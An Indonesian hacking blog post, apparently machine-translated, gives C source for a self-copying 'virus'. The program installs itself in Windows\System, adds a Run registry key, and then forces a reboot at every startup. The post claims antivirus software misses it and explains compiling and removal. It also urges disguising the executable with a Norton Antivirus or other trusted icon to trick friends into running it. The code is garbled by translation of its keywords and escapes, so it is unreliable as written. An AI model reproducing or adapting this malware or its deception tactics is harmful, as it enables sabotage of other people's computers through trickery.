Program Virus Restart Komputer di Setiap Startup

Written By dika on Rabu, 16 Maret 2011 | 18.36

Program Virus Restart Komputer di Setiap Startup 
 
Hari ini saya akan menunjukkan Anda bagaimana untuk membuat virus yang restart komputer setelah setiap startup. Artinya, setelah infeksi, komputer akan restart setiap kali sistem di-boot. Ini berarti bahwa komputer akan menjadi bisa dioperasi karena reboot secepat desktop dimuat. 


Untuk ini, virus perlu doubleclicked hanya sekali dan sejak itu seterusnya akan membawa keluar sisa operasi. Dan satu hal lagi, tidak ada software antivirus mendeteksi's ini sebagai virus karena saya telah dikodekan virus ini di C. Jadi jika Anda sudah familiar dengan bahasa C maka terlalu mudah untuk memahami logika di balik coding. 






Berikut ini adalah kode sumber. 


# Include <stdio.h> # Include <dos.h> # Include <dir.h>
int ditemukan, drive_no; char buff [128];
void findroot () { int dilakukan; struct ffblk ffblk; / / File struktur balok dilakukan = findfirst ("C: \ \ windows \ \ system", & ffblk, FA_DIREC); / / untuk menentukan root drive jika (dilakukan == 0) { dilakukan = findfirst ("C: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); / / untuk menentukan apakah virus tersebut telah terinstal atau tidak jika (dilakukan == 0) { ditemukan = 1; / / berarti bahwa sistem sudah terinfeksi kembali; } drive_no = 1; kembali; } dilakukan = findfirst ("D: \ \ windows \ \ system", & ffblk, FA_DIREC); jika (dilakukan == 0) { dilakukan = findfirst ("D: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); jika (Dilakukan == 0) { ditemukan = 1; kembali; } drive_no = 2; kembali; } dilakukan = findfirst ("E: \ \ windows \ \ system", & ffblk, FA_DIREC); jika (dilakukan == 0) { dilakukan = findfirst ("E: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); jika (dilakukan == 0) { ditemukan 1 =; kembali; } drive_no = 3; kembali; } dilakukan = findfirst ("F: \ \ windows \ \ system", & ffblk, FA_DIREC); jika (dilakukan == 0) { dilakukan = findfirst ("F: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0); jika (dilakukan == 0) { ditemukan 1 =; kembali; } drive_no = 4; kembali; } lain exit (0); }
void main () { FILE * diri, * target; findroot (); jika (ditemukan == 0) / / jika sistem belum terinfeksi { diri = fopen (_argv [0], "rb"); / / The file virus itu sendiri dibuka switch (drive_no) { kasus 1: target = fopen ("C: \ \ windows \ \ system \ \ sysres.exe", "wb"); / / untuk menempatkan salinan dari dirinya sendiri di tempat terpencil system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ SRES v / \ / REG_SZ t \ / d C: \ \ windows \ \ system \ \ sysres.exe "); / / simpan file ini ke registri untuk starup break;
Kasus 2: target = fopen ("D: \ \ windows \ \ system \ \ sysres.exe", "wb"); system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ SRES v / \ / REG_SZ t \ / d D: \ \ windows \ \ system \ \ sysres.exe "); break;
kasus 3: target = fopen ("E: \ \ windows \ \ system \ \ sysres.exe", "wb"); system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ SRES v / \ / REG_SZ t \ / d E: \ \ windows \ \ system \ \ sysres.exe "); break;
Kasus 4: target = fopen ("F: \ \ windows \ \ system \ \ sysres.exe", "wb"); system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run \ SRES v / \ / REG_SZ t \ / d F: \ \ windows \ \ system \ \ sysres.exe "); break;
default: exit (0); }
while (fread (buff, 1,1, diri)> 0) fwrite (buff, 1,1, target); fcloseall (); }
lain system ("shutdown-r-t 0"); / / jika sistem sudah terinfeksi kemudian hanya memberikan perintah untuk restart }


CATATAN: KOMENTAR YANG DIBERIKAN DI WARNA COKLAT. 

 Kompilasi Kode Scource Ke Virus eksekusi. 

1. Download Kode Sumber Disini
2. File yang didownload akan Sysres.C
3. Untuk langkah-demi-langkah panduan kompilasi, lihat posting saya Bagaimana mengkompilasi C Program. 

  
Pengujian Dan Menghapus Virus ini Dari PC Anda 

Anda dapat mengkompilasi dan tes ini virus pada PC Anda sendiri tanpa rasa takut. Untuk menguji, hanya DoubleClick file sysres.exe dan restart sistem secara manual. Sekarang dan seterusnya, ketika setiap kali PC boot dan desktop dimuat, PC Anda akan restart secara otomatis lagi dan lagi. Tidak akan ada salahnya selain dari secara otomatis me-restart sistem anda. Setelah pengujian, Anda dapat menghapus virus dengan langkah-langkah berikut. 


1. Reboot komputer Anda di SAFE MODE
2. Goto X: \ Windows \ System (X dapat C, D, E atau F)
3.Anda akan menemukan file dengan sysres.exe nama, menghapusnya.
regedit 4.Type di run.You akan goto registri editor.Here menavigasi ke HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run

 
Di sana, di situs kanan anda akan melihat entri dengan nama "SRES" Hapus it.You s entry.That ini '. Telah menghapus Virus ini berhasil. 


Logika Dibalik Kerja Virus ini 


Jika saya tidak menjelaskan logika (Algoritma) balik kerja virus, posting ini akan tidak lengkap. Jadi saya akan menjelaskan logika dengan cara yang disederhanakan. Di sini saya tidak akan menjelaskan rincian teknis program. Jika Anda memiliki keraguan lebih lanjut silakan komentar lulus. 


 
LOGIC: 


1. Pertama virus akan menemukan partisi root (Partisi di mana Windows diinstal). 


2. Selanjutnya akan menentukan apakah file Virus sudah disalin (Sudah terinfeksi) ke X: \ Windows \ System 


3. Jika tidak hanya akan menempatkan salinan dirinya ke dalam X: \ Windows \ System dan membuat entri registry untuk menempatkan file ini virus ke startup. 


4. Atau jika virus tersebut sudah ditemukan di X: \ direktori Windows \ System (folder), maka hanya memberi perintah untuk me-restart komputer. 


Proses ini diulangi setiap kali PC di-restart. 


CATATAN: Sistem tidak akan direstart segera setelah Anda klik ganda file.The Sysres.exe proses restart akan terjadi dari boot berikutnya dari sistem. 


DAN SATU HAL SEBELUM ANDA LEBIH CUTI (Langkah ini opsional) 


Setelah anda mengkompilasi, file Sysres.exe bahwa Anda mendapatkan akan memiliki ikon default. Jadi, jika Anda mengirim file ini ke teman Anda mereka mungkin tidak klik di atasnya karena memiliki ICON default. Jadi adalah mungkin untuk mengubah ICON file ini Sysres.exe ke dalam setiap ICON lain yang lebih dipercaya dan terlihat menarik. 


Sebagai contoh Anda dapat mengubah. Ikon exe file ke Norton antivirus ICON itu sendiri sehingga orang-orang melihat file ini percaya bahwa itu adalah Norton antivirus. Atau Anda dapat mengubah ICON itu ke dalam ICON dari setiap program populer dan terpercaya sehingga orang pasti akan klik di atasnya. 


Rincian tutorial mengubah ICON diberikan dalam posting saya Cara Mengganti ICON Dari Sebuah File EXE.

0 komentar:

Posting Komentar

Terima Kasih Atas Kunjungan Anda,Segala Kritik Dan Saran Menjadi Perbaikan ADMIN.Mohon Jangan Menampilkan Email Anda Dalam Komentar, Demi Privasi Email Anda.

Masukan Email Anda Untuk BErlangganan Konten HACKING

Enter your email address:

Delivered by FeedBurner